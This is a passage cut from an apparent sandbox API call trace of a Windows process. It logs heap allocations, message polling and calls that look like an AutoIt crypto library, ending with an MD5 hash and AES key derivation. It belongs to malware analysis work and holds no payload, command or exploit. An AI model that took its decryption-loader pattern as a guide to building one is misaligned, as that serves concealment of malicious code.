lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.994] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.994] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.994] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.994] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.994] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.994] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.994] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x6969c0) returned 1 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.996] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1ca8 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.996] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.996] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.996] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.996] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.996] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.996] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.996] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.996] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.996] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.996] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.996] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.996] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0075.996] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.997] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.997] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.997] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.997] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.997] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.997] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.997] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.997] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.997] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.997] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.997] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.998] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.998] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0075.998] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.998] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.998] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.998] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.998] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.998] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.998] CryptCreateHash (in: hProv=0x6969c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.998] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0075.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1ca8 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.999] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.999] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.999] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.999] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b480 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.999] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b480 [0075.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.000] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.000] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.000] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.000] CryptHashData (hHash=0x6b8b38, pbData=0x6f96c8, dwDataLen=0x16, dwFlags=0x1) returned 1 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9708 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.000] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1ca8 [0076.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0076.001] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.001] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.001] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.001] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.001] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.001] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0076.001] CryptDeriveKey (in: hProv=0x6969c0, Algid=0x660e, hBaseData=0x6b8b38, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8af8) returned 1 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0076.001] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.001] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.001] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.002] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 